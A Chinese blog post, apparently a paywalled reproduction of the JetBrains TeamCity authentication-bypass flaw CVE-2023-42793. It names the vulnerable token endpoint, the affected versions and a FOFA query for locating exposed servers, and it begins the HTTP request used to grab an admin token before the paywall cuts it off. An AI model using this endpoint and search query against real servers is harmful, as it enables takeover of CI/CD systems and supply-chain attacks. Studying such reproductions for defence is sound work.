JetBrains TeamCity RCE漏洞复现(CVE-2023-42793)

最新推荐文章于 2024-06-30 16:03:11 发布
最新推荐文章于 2024-06-30 16:03:11 发布
阅读量1.1k 收藏 9
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134782337
版权

0x01 产品简介

 JetBrains TeamCity 是 JetBrains 公司开发的一款通用 CI/CD 软件平台。

0x02 漏洞概述

 JetBrains TeamCity 可通过访问 /app/rest/users/{ {id}}/tokens/RPC2 端点获取对应 id 用户的有效 token,携带 admin token 访问受限端点导致远程命令执行或创建后台管理员用户。

0x03 影响范围

TeamCity On-Premises version < 2023.05.04 

0x04 复现环境

FOFA:body="Log in to TeamCity"

0x05 漏洞复现 

获取id为1用户的tooken

POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) V
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27198)
0xSec
03-05 1669
JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
TeamCity 身份验证绕过漏洞(CVE-2024-27198)
qq_36334672的博客
03-07 307
etBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。恶意攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。恶意攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
漏洞分析|JetBrains TeamCity 任意用户创建(CVE-2023-42793
xuandaoren的博客
12-08 569
可以下载官方补丁进行修复:https://blog.jetbrains.com/zh-hans/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/ ,也可直接升级到2023.05.4版本之后。接下来反编译 /TeamCity-2023.05.2/webapps/ROOT/WEB-INF/plugins/rest-api/server/rest-api.jar,
​⚠️ 警告:JetBrains TeamCity 中的趋势 CVE-2023-42793
ptsecurity的博客
09-26 3846
利用该漏洞,攻击者可以通过网络访问 TeamCity 服务器,获取项目源代码,并通过在项目构建任务执行代理上执行任意代码,对基础架构发起进一步攻击。该漏洞可能会给供应商带来不可接受的网络安全事件。该漏洞是由于对服务器 API 的访问控制不足造成的,允许未经身份验证的攻击者访问管理面板。❗️根据供应商的建议,要修复该漏洞,应将 TeamCity 服务器升级到 2023.05.4 版。要降低与该漏洞相关的风险,应安装供应商的补丁插件。如果安装了最新的知识库更新,将自动识别易受攻击的资产。软件开发公司面临风险。
Teamcity执行Powershell命令时抛异常
tcmtang的博客
12-05 549
Teamcity执行Powershell命令时抛异常
JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198 未授权创建用户token】 + 上传恶意插件执行命令 反弹shell【复现漏洞】【有漏洞exp】
weixin_43977052的博客
03-07 1225
1、绕过限制,未授权生成token。2、利用创建用户token上传恶意插件以实现任意代码执行。
严重漏洞可导致TeamCity CI/CD 服务器遭接管
smellycat000的专栏
09-26 201
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士TeamCity CI/CD 服务器中存在一个严重漏洞,可在无需认证的情况下遭远程利用,执行任意代码并获得对易受攻击服务器的管理控制权限。TeamCityJetBrains 开发,是适用于本地和云的通用构建管理和可持续集成平台。CVE-2023-42793(CVSS评分9.8)是影响 TeamCity 本地版本的认证绕过漏洞。发现该漏洞的公...
terraform-provider-teamcityJetbrains TeamCity CI服务器的Terraform Provider
02-04
地形提供商TeamCity 动机: 安装 Terraform注册表-Terraform 0.13+(推荐) Teamcity Provider。 最简单的入门方法是按照。 例: terraform { required_providers { teamcity = { source = " cvbarros/team...
teamcity:dohq-teamcity是一个Python软件包,提供对JetBrains TeamCity服务器API的访问
05-24
团队合作 dohq-teamcity是一个Python软件包,提供对JetBrains TeamCity服务器API的访问。 该库支持所有方法,如果找不到,请创建问题。安装 # Latest releasepip install dohq-teamcity# Develop branchgit clone ...
cake-teamcity:TeamCity的蛋糕整合
05-16
TeamCityJetBrains公司开发的一款流行的持续集成(CI)/持续部署(CD)工具,它可以帮助开发者自动化测试、编译和部署项目。 在描述中提到的“蛋糕团队”可能是指一个专注于使用Cake进行构建和自动化任务的开发...
【批量下载】jetbrains-agent等_jetbrains-agent_jetbrains-agent.jar_Windo
09-29
标题中的“【批量下载】jetbrains-agent等_jetbrains-agent_jetbrains-agent.jar_Windo”涉及到的是一个与JetBrains相关的工具——jetbrains-agent,它通常用于自动化某些任务,比如批量下载JetBrains IDE(如...
teamcity-rest-client:用Kotlin编写的TeamCity REST API的客户端
05-02
teamcity-rest-client 用Kotlin编写的TeamCity REST API的客户端。 下面的代码片段将从最新的成功构建中下载*.zip工件,其标记publish指定的构建配置publish到out目录。 val docs = BuildConfigurationId ( " Kotlin...
Goby 漏洞发布|JetBrains TeamCity 权限绕过漏洞CVE-2024-27198 & CVE-2024-27199)
m0_46699477的博客
03-21 248
JetBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。JetBrains TeamCity2023.11.4 版本之前存在认证绕过漏洞。攻击者可以利用该漏洞绕过认证机制,直接执行管理员操作,并结合后台功能,攻击者可通过该漏洞在服务器端任意执行系统命令,写入后门,获取服务器权限,进而控制整个web服务器。
谷歌紧急修复2023年的第六个 0day
smellycat000的专栏
11-29 189
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今天谷歌发布关于多个漏洞安全更新,其中修复了一个 Chrome 0day 漏洞 CVE-2023-6345,是今年修复的第6个 0day。谷歌证实称目前已存在关于 CVE-2023-6345的在野利用。该漏洞已在 Stable Desktop 频道修复,已修复版本已向全球的Windows 用户 (119.0.6045.199/.200) 和 M...
网络安全日报 2023年12月15日
Galaxy_0的博客
12-15 1043
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
微软称朝鲜黑客正在利用 JetBrains TeamCity 漏洞
smellycat000的专栏
10-19 196
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士微软指出,朝鲜黑客组织被指正在利用位于 JetBrains TeamCity 中的一个严重漏洞,攻陷易受攻击的服务器。这些攻击利用的是CVE-2023-42793(CVSS评分9.8),被归咎于Diamond Sleet 以及 Onyx Sleet阻止。值得注意的是,这两个黑客团伙都是臭名昭著的朝鲜黑客组织 Lazarus 组织的组成部分。Dia...
云计算【第一阶段(23)】Linux系统安全及应用
YCyjs的博客
06-28 783
如果需要每个用户登出时都清除输入的命令历史记录,可以在/etc/skel/.bash_logout文件中添加下面这行rm -f $HOME/.bash_history。实现过程如下:将授权使用 su 命令 的用户添加到 wheel 组,修改/etc/pam.d/su 认证配置以启用 pam_wheel 认证。d、如果注释第一行,开启第二行,表示只有whee1组内的用户才能使用su命令,root用户也被禁用su命令。在/etc/pam.d/su文件里设置禁止用户使用su命令。
Java中的安全编码实践与防御技巧
最新发布
微赚淘客开发者博客
06-30 498
在Java应用程序开发中,确保安全编码实践和防御技巧的有效实施,是保护用户数据和应用程序安全的关键。通过遵循以上建议和最佳实践,开发人员可以显著减少潜在的安全风险,提升系统的整体安全性和可靠性。大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!:利用成熟的安全框架和库,如Spring Security等,来简化安全性实现并提供额外的保护层。:保持对最新安全威胁和漏洞的了解,并采取相应的技术和工具来保护应用程序。
港口危险货物安全管理人员考试题库(含答案)
m0_66937659的博客
06-28 435
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
jetbrains teamcity漏洞复现
12-22
JetBrains TeamCity是一款持续集成和部署工具,可以帮助开发团队自动构建、测试和部署他们的软件项目。然而,就像任何其他软件产品一样,TeamCity也可能存在一些安全漏洞。 要复现TeamCity漏洞,首先需要了解该漏洞的具体情况。我们可以通过查看公开的漏洞报告或者安全研究人员的分析报告来获得相关信息。一旦了解了漏洞的性质和利用方式,就可以准备复现漏洞的实验环境。 在搭建实验环境之前,需要确保已经安装了TeamCity的最新版本。接下来,可以使用各种方法来尝试利用漏洞,比如尝试输入特定的恶意代码、发送构建请求或者尝试绕过权限进行非法操作。如果成功复现漏洞,就需要记录下复现的所有步骤和结果,并且通知JetBrains官方团队。 在通知官方团队之前,需要确保已经遵守了合适的道德规范和法律法规。即使是在复现漏洞的过程中,也需要避免造成对系统的实质性破坏或者损害。 通过复现漏洞,可以帮助软件厂商及时发现和修复安全漏洞,提高系统的安全性。同时,也为安全社区和用户提供了重要的安全信息和防护建议。在安全研究领域,漏洞复现是一项重要的工作,可以帮助软件产品不断提升安全水平,保护用户数据和系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值